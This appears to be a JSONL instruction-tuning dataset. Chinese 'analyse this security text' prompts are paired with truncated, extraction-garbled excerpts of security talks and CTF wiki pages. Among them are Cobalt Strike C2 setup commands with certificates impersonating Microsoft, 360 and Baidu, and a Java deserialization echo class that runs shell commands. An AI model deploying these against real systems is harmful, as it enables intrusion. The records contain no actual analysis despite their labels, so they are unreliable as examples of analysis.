{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLego My Stego Lego My Stego Steganography Steganography in the post Web 2.0 World in the post Web 2.0 World James Shewmaker  2008 James Shewmaker  2008 Defcon 0x10 Defcon 0x10 Todays Agenda Todays Agenda  Todays Agenda Todays Agenda  Background: Classical Stego Background: Classical Stego  Digital Stego Techniques Digital Stego Techniques  Extending Stego concepts Extending Stego concepts  Surviving Conversion Surviving Conversion  Post-Mortem Conversion Detection Post-Mortem Conversion Detection Classic Stego Classic Stego  Old School Spy vs. Spy Old School Spy vs. Spy  Classified Ads Classified Ads  Microdot Microdot  Digital Stego - Any media file that samples Digital Stego - Any media file that samples reality can have its Least Significant Bit reality can have its Least Significant Bit (LSB) tweaked with minor disruptions (LSB) tweaked with minor disruptions Classic Digital Stego Classic Digital Stego  Classic Digital Stego Classic Digital Stego  Manipulating that Least Significant Bit Manipulating that Least Significant Bit  Using unused space in a host file Using unused space in a host file  Examples Examples  Digital audio  fairly subtle Digital audio  fairly subtle  Even magnitude == zero Even magnitude == zero  Odd magnitude == one Odd magnitude == one  Digital image  also fairly subtle Digital image  also fairly subtle  Even LSB of a pixel == zero Even LSB of a pixel == zero  Odd LSB of a pixel == one Odd LSB of a pixel == one Distributed Stego Distributed Stego  Many public video sites converted to flash video Many public video sites converted to flash video (FLV) (FLV)  Take your favorite viral marketing video Take your favorite viral marketing video  Encode to FLV before you upload Encode to FLV before you upload  Store data with LSB stego using each frame/tag/box Store data with LSB stego using each frame/tag/box  (GIF/PNG/JPEG, etc.) (GIF/PNG/JPEG, etc.)  Store parity bit with each audio sample Store parity bit with each audio sample  Classic/Simple ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKeeping Secret Secrets Secret Keeping Secret Secrets Secret and and Sharing Secret Secrets Secretly Sharing Secret Secrets Secretly Vic Vandal Vic Vandal vvandal@well.com vvandal@well.com DefCon DefCon-XVI / 2008 -XVI / 2008 Vics Usual Disclaimer  Dont do anything illegal.  If you do anything illegal, dont get caught.  I take no personal responsibility for the subsequent illegal use of any information provided here by anyone.  I dont condone/support espionage, treason, child porn, terrorism, or general stupidity. I may take more liberal views on some of the other usage examples herein.  I own my own words, which means I may legally challenge any use or duplication of them for which I have not provided explicit permission.  Any duplication of this presentation must include this slide. Stego Stego Files Link Files Link (for later in the presentation) (for later in the presentation) http://www.well.com/~sthomas/.Secret-Page.html Introduction  What is a secret?  DUH!anything secret, keys to important items, secret plans/designs/code, sensitive info/items, etc.  Why protect secrets?  Because SECRET = SECRET (see Websters definition for more on that secret formula, cough)  Why share secrets?  Secrecy  Fault-tolerance  Profit  Fun Chaffing and Winnowing Chaffing and Winnowing What Is It?  Winnowing -- separating out or eliminating the chaff  Chaffing -- adding chaff to a collection  By a sender strategically adding chaff to a message, it becomes garbled/hidden  By the receiver correctly winnowing out the chaff, they can retrieve the original message How Its Done 1. Authenticate each packet of message with a shared authentication key 2. Append a Message Authentication Code (MAC) to each packet 3. After authentication, add chaff packets with bad MACs to the message stream  MACs are added to message packets by calculating the MAC value and appending the fixed length MAC to each corresponding packet Authentication Key  Authentication key used to calculate MACs is shared by sen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCobaltStrike 0x00 C2 @L.N TeamServerCS TeamServer CobaltStrike 4.3 DoS C2 0x01 + 1. teamserver 50050 java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=55555 -Dcobaltstrike.ser ver_bindto=0.0.0.0 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl .keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpa th cobaltstrike.jar -Duser.language=en -javaagent:CSAgent.jar=3a4425490f389aeec3 12bdd758ad2b99 server.TeamServer $* 2. # Outlook keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname \"CN=Outlook.live.com, OU=Microsoft Corporation # 360 keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey - keyalg RSA -alias 360.com -dname \"CN=US, OU=360.com, O=Sofaware, L=Somewhere, ST =Cyberspace, C=CN\" # baidu keytool -keystore cobaltStrike.store -storepass 123456 -keypass 123456 -genkey - keyalg RSA -alias baidu.com -dname \"CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=C haoYang, C=CN\" # keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstri ke.store -deststoretype pkcs12 PS: 3. HTTPS 3.1 Let's Encrypt HTTPsC2DoneRight.sh HTTPS @ func_install_letsencrypt func_install_letsencrypt(){ echo '[Starting] cloning into letsencrypt!' # git clone https://github.com/certbot/certbot /opt/letsencrypt echo '[Success] letsencrypt is built!' # cd /opt/letsencrypt echo '[Starting] to build letsencrypt cert!' certbot --apache -d $domain -n --register-unsafely-without-email --agree-tos if [ -e /etc/letsencrypt/live/$domain/fullchain.pem ]; then echo '[Success] letsencrypt certs are built!' else echo \"[ERROR] letsencrypt certs failed to build. Check that DNS A recor d is properly configured f exit 1 fi } sudo apt install -y git lsof snap sudo snap install core; sudo snap refresh core sudo apt remove certbot sudo snap install certbot sudo ln -s /snap/bin/certbot /usr/bin/certbot wget https://raw.githubusercontent.com/killswitch-GUI/CobaltStrike-Tool", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Colors (ppc/Programming, 100p) ### PL Version `for ENG version scroll down` System wyświetlał na stronie internetowej obrazek złożony z kwadratów. Wsystkie kwadraty oprócz jednego miały taki sam kolor - jeden z nich miał lekko inny odcień. Celem zadania było kliknięcie w ten odmienny kwadrat. System rejestrował gdzie kliknęliśmy i na tej podstawie oceniał poprawność rozwiązania i prezentował kolejny przykład. Celem było rozwiązanie kilkudziesieciu przykładów pod rząd w celu uzyskania flagi. ![](./squares.png) Aby rozwiązać zadany problem przygotowaliśmy skrypt w pythonie z użyciem Python Images Library dostępny [tutaj](colors.py). Skrypt pobiera zadany obraz, wylicza rozkład kolorów pikseli i na tej podstawie wybiera najrzadziej występujący kolor (pomiajając biały, który oddziela kwadarty od siebie). Następnie skanujemy obraz w poszukiwaniu jakiegoś piksela tego koloru i zwracamy pozycję tego piksela jako rozwiązanie. def getPixel(picture_path): fd = urllib.urlopen(picture_path) image_file = io.BytesIO(fd.read()) im = Image.open(image_file) colors_distribution = im.getcolors() non_white = [color for color in colors_distribution if color[1] != (255, 255, 255)] ordered = sorted(non_white, key=lambda x: x[0], reverse=False) print(ordered[0]) width, height = im.size for index, color in enumerate(im.getdata()): if color == ordered[0][1]: y = index / width x = index % width return x, y Po rozwiązaniu kilkudziesięciu przykładów otrzymujemy: `TMCTF{U must have R0807 3Y3s!}` ### ENG Version The system displays on a webpage an image consisting of squares. All but one have the same color - one has a slighly different shade. The task was to click in on the square with different color. The system would register the click location and decide if our solution is correct. We had to solve multiple consecutive examples in order to get the flag. ![](./squares.png) To solve the task we prepared a python script using Python Images Library available [here](colors.py). The script downlo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 基本 ROP概述 随着 NX 保护的开启以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果攻击者们也提出来相应的方法来绕过保护目前主要的是 ROP(Return Oriented Programming)其主要思想是在**栈缓冲区溢出的基础上利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值从而控制程序的执行流程**所谓gadgets 就是以 ret 结尾的指令序列通过这些指令序列我们可以修改某些地址的内容方便控制程序的执行流程 之所以称之为 ROP是因为核心在于利用了指令集中的 ret 指令改变了指令流的执行顺序ROP 攻击一般得满足如下条件 - 程序存在溢出并且可以控制返回地址 - 可以找到满足条件的 gadgets 以及相应 gadgets 的地址 如果 gadgets 每次的地址是不固定的那我们就需要想办法动态获取对应的地址了 ### ret2text原理 ret2text 即控制程序执行程序本身已有的的代码(.text)其实这种攻击方法是一种笼统的描述我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是 gadgets)这就是我们所要说的ROP 这时我们需要知道对应返回的代码的位置当然程序也可能会开启某些保护我们需要想办法去绕过这些保护 ### ret2text例子 其实在栈溢出的基本原理中我们已经介绍了这一简单的攻击在这里我们再给出另外一个例子bamboofox 中介绍 ROP 时使用的 ret2text 的例子 点击下载: [ret2text](https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text) 首先查看一下程序的保护机制 ```shell  ret2text checksec ret2text Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) ``` 可以看出程序是 32 位程序其仅仅开启了栈不可执行保护然后我们使用 IDA 来查看源代码 ```C int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts(\"There is something amazing here, do you know anything?\"); gets((char *)&v4); printf(\"Maybe I will tell you next time !\"); return 0; } ``` 可以看出程序在主函数中使用了 gets 函数显然存在栈溢出漏洞此后又发现 ```asm .text:080485FD secure proc near .text:080485FD .text:080485FD input = dword ptr -10h .text:080485FD secretcode = dword ptr -0Ch .text:080485FD .text:080485FD push ebp .text:080485FE mov ebp, esp .text:08048600 sub esp, 28h .text:08048603 mov dword ptr [esp], 0 ; timer .text:0804860A call _time .text:0804860F mov [esp], eax ; seed .text:08048612 call _srand .text:08048617 call _rand .text:0804861C mov [ebp+secretcode], eax .text:0804861F lea eax, [ebp+input] .text:08048622 mov [esp+4], eax .text:08048626 mov dword ptr [esp], offset unk_8048760 .text:0804862D call ___isoc99_scanf .text:08048632 mov eax, [ebp+input] .text:08048635 cmp eax, [ebp+secretcode] .te", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents eBPF ELFs JMPing Through the Windows Richard Johnson Trellix #BHUSA @BlackHatEvents Information Classification: General Whoami Richard Johnson Senior Principal Security Researcher, Trellix Vulnerability Research & Reverse Engineering Owner, Fuzzing IO Advanced Fuzzing and Crash Analysis Training Contact rjohnson@fuzzing.io @richinseattle Shout out to the Trellix Interns! Kasimir Schulz Andrea Fioraldi @abraxus7331 @andreafioraldi #BHUSA @BlackHatEvents Information Classification: General Outline  Origins and Applications of eBPF  Architecture and Design of eBPF for Windows  Attack Surface of APIs and Interfaces  Fuzzing Methodology and Results  Concluding Thoughts #BHUSA @BlackHatEvents Information Classification: General What is eBPF eBPF is a virtual CPU architecture and VM aka Berkley Packet Filter extended to a more general purpose execution engine as an alternative to native kernel modules eBPF programs are compiled from C into the virtual CPU instructions via LLVM and can run in emulated or JIT execution modes and includes a static verifier as part of the loader Execution is sandboxed and highly restricted in what memory it can access and how many instructions each eBPF program may contain eBPF is designed for high speed inspection and modification of network packets and program execution #BHUSA @BlackHatEvents Information Classification: General Origins of eBPF Berkeley Packet Filter technology was developed in 1992 as a way to filter network packets BPF was reimplemented for most Unix style operating systems and also ported to userland Most users have interacted with BPF via tcpdump, wireshark, winpcap, or npcap Using tcpdump and supplying a filter string like dst host 10.10.10.10 and (tcp port 80 or tcp port 443) automatically compiles into a BPF filter for high performance. We now call this older BPF interface cBPF or Classic BPF #BHUSA @BlackHatEvents Information Classification: General Origins of eBPF In December 2014, Linux kernel", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSee no evil, hear no evil Hacking invisibly and silently with light and sound www.pwc.co.uk July 2017 Matt Wixey  PwC UK PwC Intro  Matt Wixey  Lead the research function on PwCs UK pentesting team  Run The Dark Art Lab research blog  Previously worked in LEA, leading R&D team PwC Agenda  Part I: Jumping air-gaps  Part II: Surveillance and counter-surveillance  Part III: Bantz  Part IV: Summary and future research PwC Disclaimers  The views and opinions expressed in this talk are not necessarily those of PwC  All content is for educational purposes only. Read up on relevant laws, only attack systems you own or have permission to attack!  What this presentation isnt  I am in no way an electronics expert PwC Dunning-Kruger Curve Me Mt. Stupid PwC PwC PwC Part I Jumping air-gaps  A Sensor Darkly  Dreadphone  Spectregram PwC Caveats  Virtually all research in this area assumes that the attacker has already managed to infect at least one host  Attacker has physical or near-physical access  Exfiltration is of small pieces of data PwC Previous research  Van Eck phreaking  e.g. Kuhn (2003); Halevi and Saxena (2012)  AirHopper (Guri et al 2014)  radio frequencies  BitWhisper (Guri et al 2015)  heat  VisiSploit (Guri et al 2016)  codes & camera  Fansmitter (Guri et al 2016)  acoustic  SPEAKE(a)R (Guri et al 2016)  speakers to mics  xLED (Guri et al 2017)  Hasan et al (2013)  great overview of techniques  Including ALS for mobile devices  Lots more! PwC ALS  Ambient Light Sensor  Increasingly common  Laptops  Monitors  Smartphones  Tablets  Smartwatches PwC A Sensor Darkly  The plan:  Create malware to read light (lux) values from the ALS through the API  Malware executes different commands according to changes in the intensity  Problems:  Hurr durr, Ill just shine this massive torch onto my laptop to execute commands  Need exfil capability PwC Demo PwC Exfiltration PwC Exfiltration PwC Results PwC Prototype 2 PwC Dreadphone  C2 using near-ultrasonic sounds (16-20KhZ)  Standar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvolution of iOS Data Protection and iPhone Forensics: from iPhone OS to iOS 5 Andrey Belenko & Dmitry Sklyarov Elcomsoft Co. Ltd. 1 Agenda  Basics  iOS Security before iOS 4  iOS 4 Data Protection  iOS 5 Data Protection Changes  Summary 2 Forensics 101 Acquisition  Analysis  Reporting GOALS: 1. Assuming physical access to the device extract as much informa>on as prac>cal 2. Leave as li@le traces/ar>facts as prac>cal 3 iOS: Why Even Bother?  More than 5 years on the market  360+ million iOS devices sold worldwide  6 iPhones, 4 iPods, 3 iPads  Smart devices  they do carry a lot of sensitive data  Corporate deployments are increasing There was, is, and will be a real need in iPhone Forensics 4 iPhone Forensics 101  Passcode Prevents unauthorized access to the device Bypassing passcode is usually enough  Keychain System-wide storage for sensitive data Encrypted  Storage encryption 5 iPhone Forensics 101  Logical: iPhone Backup Ask device to produce a backup Device must be unlocked Device may produce encrypted backup Limited amount of information Get backup from iCloud  Physical: filesystem acquisition Boot-time exploit to run unsigned code Device lock state isnt relevant Can get all information from the device  Physical+: flash memory acquisition Same requirements as for physical Also allows recovery of deleted files! 6 The Inception Runs iPhone OS (up to 3.1.3) Based on Mac OS X Has a crypto co-processor 06/29/2007 iPhone 7 Hardware Keys Two embedded AES keys:  GID  shared by all devices of same family  UID  unique for each and every device No known ways to extract GID/UID keys 06/29/2007 iPhone 8 Device Keys To avoid unnecessary exposure, usage of UID/ GID keys is limited Device keys are computed from hardware keys during boot:  0x835 = AES_Enc (UID, 01010101010101010101010101010101);  0x836 = AES_Enc (UID, 00E5A0E6526FAE66C5C1C6D4F16D6180);  0x837 = AES_Enc (GID, 345A2D6C5050D058780DA431F0710E15);  0x838 = AES_Enc (UID, 8C8318A27D7F030717D2B8FC5514F8E1); 9 iPhone OS Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOutsmarting the Smart City DISCOVERING AND ATTACKING THE TECHNOLOGY THAT RUNS MODERN CITIES & 2 Page Researcher Bios  Daniel Crowley  Research Baron at IBM X-Force Red  Pen tester since 2004  Locksport enthusiast and past competition winner  Actually holds the title of Baron (in Sealand) 3 Page Researcher Bios  Jennifer Savage  Security Researcher at Threatcare  Black Hat review board member  Experience includes:  development  vulnerability assessment  vulnerability management  penetration testing  security research 4 Page Researcher Bios  Mauro Paredes  Managing Consultant at IBM X-Force Red  Passion for security flaws and their corrections  Formerly developer, net/server admin, security architect  Pen tester for many years  20+ years infosec experience in multiple industries 5 Page What kind of tech makes a city smart?  Industrial Internet of Things  Urban Automation  Public Safety / Emergency Management  Intelligent Transportation Systems  Metropolitan Area Networks 6 Page Limited citizen privacy and risk management options  You dont have to buy an Alexa  You can buy a non-smart TV  You can buy a feature phone (or forego a cell phone)  You can buy an ancient car  Can you move to a city that isnt smart? 7 Page V2I, V2V, OBD-III and DSRC Connected vehicles communicate with each other, and with city infrastructure, as travel occurs. While DSRC allows unique identification, the proposed OBD-III standard is much more powerful. 8 Page Hangzhou City Brain In China, people have less concern with privacy, which allows us to move faster - Xian-Sheng Hua, manager of AI at Alibaba at World Summit AI in 2017 9 Page Smart streetlights with cameras GEs Bill Ruh says its up to each city to set policies around the data collected by the sensors and how it can be used. 10 Page Facial recognition In 2017 the former head of Singapores civil service Peter Ong said Singapore wants to deploy facial recognition technology to all 110,000 lampposts in the country. 11 Page Dubai robotic pol", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Unsorted Bin Attack概述 Unsorted Bin Attack顾名思义该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针 Unsorted Bin Attack 可以达到的效果是实现修改任意地址值为一个较大的数值 ### Unsorted Bin基本来源 1. 当一个较大的 chunk 被分割成两半后如果剩下的部分大于 MINSIZE就会被放到 unsorted bin 中 2. 释放一个不属于 fast bin 的 chunk并且该 chunk 不和 top chunk 紧邻时该 chunk 会被首先放到 unsorted bin 中关于top chunk的解释请参考下面的介绍 3. 当进行 malloc_consolidate 时可能会把合并后的 chunk 放到 unsorted bin 中如果不是和 top chunk 近邻的话 ### Unsorted Bin基本使用情况 1. Unsorted Bin 在使用的过程中采用的遍历顺序是 FIFO**即插入的时候插入到 unsorted bin 的头部取出的时候从链表尾获取** 2. 在程序 malloc 时如果在 fastbinsmall bin 中找不到对应大小的 chunk就会尝试从 Unsorted Bin 中寻找 chunk如果取出来的 chunk 大小刚好满足就会直接返回给用户否则就会把这些 chunk 分别插入到对应的 bin 中 ### Unsorted Bin Leak 原理 如果我们可以把正确的 `fd` 指针 leak 出来就可以获得一个与 `main_arena` 有固定偏移的地址这个偏移可以通过调试得出而`main_arena` 是一个 `struct malloc_state` 类型的全局变量是 `ptmalloc` 管理主分配区的唯一实例说到全局变量立马可以想到他会被分配在 `.data` 或者 `.bss` 等段上那么如果我们有进程所使用的 `libc` 的 `.so` 文件的话我们就可以获得 `main_arena` 与 `libc` 基地址的偏移实现对 `ASLR` 的绕过 那么如何取得 `main_arena` 与 `libc` 基址的偏移呢这里提供两种思路 #### 通过 __malloc_trim 函数得出 在 `malloc.c` 中有这样一段代码 ```cpp int __malloc_trim (size_t s) { int result = 0; if (__malloc_initialized < 0) ptmalloc_init (); mstate ar_ptr = &main_arena;//<=here! do { __libc_lock_lock (ar_ptr->mutex); result |= mtrim (ar_ptr, s); __libc_lock_unlock (ar_ptr->mutex); ar_ptr = ar_ptr->next; } while (ar_ptr != &main_arena); return result; } ``` 注意到 `mstate ar_ptr = &main_arena;` 这里对 `main_arena` 进行了访问所以我们就可以通过 IDA 等工具分析出偏移了 比如把 `.so` 文件放到 IDA 中找到 `malloc_trim` 函数就可以获得偏移了 #### 通过 __malloc_hook 直接算出 比较巧合的是`main_arena` 和 `__malloc_hook` 的地址差是 0x10而大多数的 libc 都可以直接查出 `__malloc_hook` 的地址这样可以大幅减小工作量以 pwntools 为例 ```python main_arena_offset = ELF(\"libc.so.6\").symbols[\"__malloc_hook\"] + 0x10 ``` 这样就可以获得 `main_arena` 与基地址的偏移了 ### 实现 Unsorted Bin Leak 的方法 一般来说要实现 leak需要有 `UAF`将一个 `chunk` 放入 `Unsorted Bin` 中后再打出其 `fd`一般的笔记管理题都会有 `show` 的功能对处于链表尾的节点 `show` 就可以获得 `libc` 的基地址了 特别的`CTF` 中的利用堆往往是刚刚初始化的所以 `Unsorted Bin` 一般都是干净的当里面只存在一个 `bin` 的时候该 `bin` 的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava安全之反序列化回显研究 0x00 前言 续上文反序列化回显与内存马继续来看看反序列化回显的方式上篇文中其实是利用中间件中存储的 Request 和 Response 对象来进行回显但并不止这么一种方式 0x01 回显方式 1. 中间件回显 2. defineClass 3. Linux描述符回显 4. RMI绑定实例 5. URLClassLoader抛出异常 6. 写文件cssjs 7. dnslog defineClass异常回显 异常类 package com.nice0e3; import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; import java.nio.charset.Charset; public class echo { public echo(String cmd) throws Exception { InputStream stream = (new ProcessBuilder(new String[]{\"cmd.exe\", \"/c\", cmd})).start().getInputStream(); InputStreamReader streamReader = new InputStreamReader(stream, Charset.forName(\"gbk\")); BufferedReader bufferedReader = new BufferedReader(streamReader); StringBuffer buffer = new StringBuffer(); String line = null; while ((line = bufferedReader.readLine()) != null) { buffer.append(line).append(\"\\n\"); } throw new Exception(buffer.toString()); } } public class demo extends ClassLoader{ private static String Classname = \"com.nice0e3.echo\"; private static byte[] ClassBytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 49, 0, 88, 10, 0, 24, 0, 46, 7, 0, 47, 7, 0, 48, 8, 0, 49, 8, 0, 50, 10, 0, 2, 0, 51, 10, 0, 2, 0, 52, 10, 0, 53, 0, 54, 7, 0, 55, 8, 0, 56, 10, 0, 57, 0, 58, 10, 0, 9, 0, 59, 7, 0, 60, 10, 0, 13, 0, 61, 7, 0, 62, 10, 0, 15, 0, 46, 10, 0, 13, 0, 63, 10, 0, 15, 0, 64, 8, 0, 65, 7, 0, 66, 10, 0, 15, 0, 67, 10, 0, 20, 0, 68, 7, 0, 69, 7, 0, 70, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 99, 111, 109, 47, 110, 105, 99, 101, 48, 101, 51, 47, 101, 99, 104, 111, 59, 1, 0, 3, 99, 109, 100, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 6, 115, 116, 114, 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking in a Foreign Language: A Network Security Guide to Russia Kenneth Geers CISSP DEFCON 13 Briefing Outline 1. Russia as a Threat 2. Russia as a Resource 3. Crossing Borders: Methodology 4. The International Political Scene Russia as a Threat Hacking: A Russian Perspective  Excellent technical education  Understanding of networks, programming  1980s: hacked American software in order to make programs work in USSR  Now: many skilled people, too few jobs  Russian police have higher priorities! Financial Incentive  Internet access is expensive  Cheaper to steal access and services  Legit MS Office = 2 months salary  CD burner = two weeks salary  Russian outdoor markets:  MS Operating System a few dollars  Hacking: more social approval?  Communal sharing culture Cybercrime  Financial crimes: banks, fraud, piracy  Russian citizen Igor Kovalyev:  Hacking is  one of the few good jobs left.  Vladimir Levin:  1994-95 transferred $10 million from Citibank  FBI NYC and Russian Telecoms traced activity to Levins St Petersburg employer  Microsoft: Oct 2000:  Traced to IP in St. Petersburg, Russia  Coreflood and Joe Lopez  Keyloggers and Ebay Dmitry Sklyarov  DefCon IX speaker  First Indictment under Digital Millennium Copyright Act (DMCA)  Advanced eBook Processor \"AEBPR  Five Adobe copyright violations  Dmitry:  Computer programmer and cryptanalyst  Long confession on FBI site  Cooperated in prosecuting Elcomsoft  Company acquitted  Victory for the EFF! ZDE = $  Russian MVD:  Cyber crime doubled in year 2003  11,000 reported cases  New techniques equal new revenue  High profits bring more investment  FBI:  Millions of credit card #'s stolen by hacker groups in Russia and Ukraine  Arrests in 2004:  International gambling extortion ring  Russian student fined for spamming IIS Annihilation  Sophisticated HangUP Web attack  Exploits Microsoft IIS, Internet Explorer  Appends malicious JavaScript onto webpages of infected site  Web surfers viewing infected pages invisibly redire", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSocial Networking Special Ops: Extending data visualization tools for faster pwnage Chris Sumner @TheSuggmeister www.securityg33k.com Latest Document The latest revision of this paper will be available at http://www.securityg33k.com/wp/BH10.pdf after the conference. This is revision r1.2 Disclaimer I am not writing on behalf of my employer. The information and perspectives I present are personal and do not represent those of my employer. Acknowledgements Roelof Temmingh, Andrew MacPherson, Dominic White, Adrian Mahieu, Tony Hawk, Jerome Case, @l0sthighway, @alien8. About the Author Chris @TheSuggmeister Sumner has been directly involved in Corporate Information Security since 1999 and has maintained a passion for security since seeing Wargames when it first came out. After a lengthy stint as a Pivot Chart creating, PowerPoint wielding, Security Manager for a business division that alone would make the Fortune100, he has turned his attention to a more geeky pursuit and is currently focused on Security in the Development Lifecycle. Outside the corporate world Chris is a data mining, analysis and visualization geek at heart and also enjoys hiding skateboards in the UK for Tony Hawks twitter hunts. 2 Social Networking Special Ops: Extending data visualization tools for faster Pwnage Chris Sumner www.securityg33k.com | TheSuggmeister@gmail.com | twitter.com/TheSuggmeister Abstract This paper describes how data visualization tools can be extended to speed up the analysis of social networks. It shows how a combination of data mining, named entity recognition and visualization can quickly draw attention to interesting social relationships. Two cases studies describe these techniques in the context of social networking. The first case study outlines how an analysis of skateboard legend Tony Hawks twitter hunt had an unexpected benefit of uncovering top talkers, including a member of Tonys staff.. The second case study illustrates how these techniques have been used to enumer", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnthony Lai Security Researcher@VXRL Taste the power of Crimeware! (HIT 2010 Edition) Special Thanks  HIT fellows  Thank you to PK and Birdman  My wife and Pomeranian family My Bio  From Hong Kong  Worked in penetration test, code audit and threat analysis  Interested in reverse engineering and malware analysis as well as programming  Story begins > At 2300 Hack the crimeware Got a link  http://pastie.org/pastes/888690 from www.malwaredomainlist.com Its features From the pastie link, it includes the following features:  It is undetectable from anti-virus scanner  Obfuscate the PDF payload randomly  Checking whether the domain is on the blacklist  Prevent Wepatweb, Jsunpack and other Javascript unpackers to decode the page.  To guarantee high level of penetration and successful exploit, it could offer various exploits, which are shown below:  Adobe Acrobat Reader Exploits (including CVE-2010-0188)  JRE (GSB & SERIALIZE)  MDAC (IE)  MS09-032 (IE)  MS09-002 (IE)  CVE-2010-0806 (IE) Aha  I love the evil feeling  Mission 1: Try it out  Understand and get to know how it works  The only way is to grab a trial account Social Engineering  Add the contact in IM.  Wait for reply 2 days later Replies and Conversation  6.1 Conversation with Crimepack key person via IM on 15 April 2010  2:17:06 AM Buyer: Hi dude  2:17:10 AM Buyer: I come from Hong Kong  2:17:17 AM Buyer: I want to purchase the Crimepack.  2:17:26 AM Buyer: how can I try it out?  2:17:29 AM Buyer: what is the price/  2:17:39 AM Buyer: how to pay it?  2:17:44 AM Buyer: and any discount for me, dude?  Changed status to Offline (2:18:53 AM)  Changed status to Online (2:18:54 AM)  2:20:56 AM NEW VERSION 2.8.2 AVAILABLE NOW: what forum are u from?  2:21:06 AM Buyer: fourm?  2:21:09 AM Buyer: pastie.org  2:23:15 AM NEW VERSION 2.8.2 AVAILABLE NOW: and where did you find the pastie link?  2:23:40 AM Buyer: I have forgotten it for a while, dude, as I just search crimepack in Google.  2:24:09 AM Buyer: crimeware  2:26:07 A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUrban Exploration - A Hackers View phreakmonkey (K.C.) mutantMandias (Mandias) phreakmonkey.com Background: What is Urban Exploration? Urban Exploration is the practice of discovering, exploring, and often photographing the more off-beat areas of human civilization. This hobby consists of a lot more than just poking about in abandoned buildings and storm drains and hanging out on web boards trying to impress people. Being an urban explorer is a whole way of looking at the world, where every ladder, door, window, grate and hole in the ground is a possible portal to adventure. - Jeff Chapman (Ninjalicious), 2004 What do we explore? Civil Buildings: Hospitals, Schools, Institutions Industrial Buildings: Factories, Transportation Utilities & Infrastructure: Steam Tunnels, Storm Drains, Utility Corridors Residential Hotels, High-rises, Houses (Shanties) The UrbEx Subculture Jeff Chapman (Ninjalicious) coined Urban Exploration & operated the zine Infiltration from 1996  2005. Several web communities have sprung up over the last ten years. UER.CA (mostly USA) DegGi5.com (NE USA) 28dayslater.co.uk (UK) Others... Explorers vs. Tourists vs. Scenesters Birds of a Feather What Urban Explorers and Computer Hackers have in common Perspective \"Behind-the-scenes\" view of the word Ability to look at things abstractly Willing to use non-standard entry points Secrecy Built around a subculture with counterculture tendencies Distrusting of newbies Hesitant to allow outsiders in Script Kiddies and Tourists Gray Area Activities Do you use your powers for good or for awesome? Sense of \"moral superiority\" while engaging in legally questionable behavior Birds of a Feather What Urban Explorers and Computer Hackers have in common Frighteningly similar lack of fashion sense. Black t-shirts are the shiznit, yo! Social Engineering Incredibly effective in UrbEx and Hacking Higher stakes (walking away vs. county lock-up) Exploitation by others Taggers vs. Website Defacers Scrappers vs. Phishers Dru", "category": "text_analysis", "source": "security_papers"}
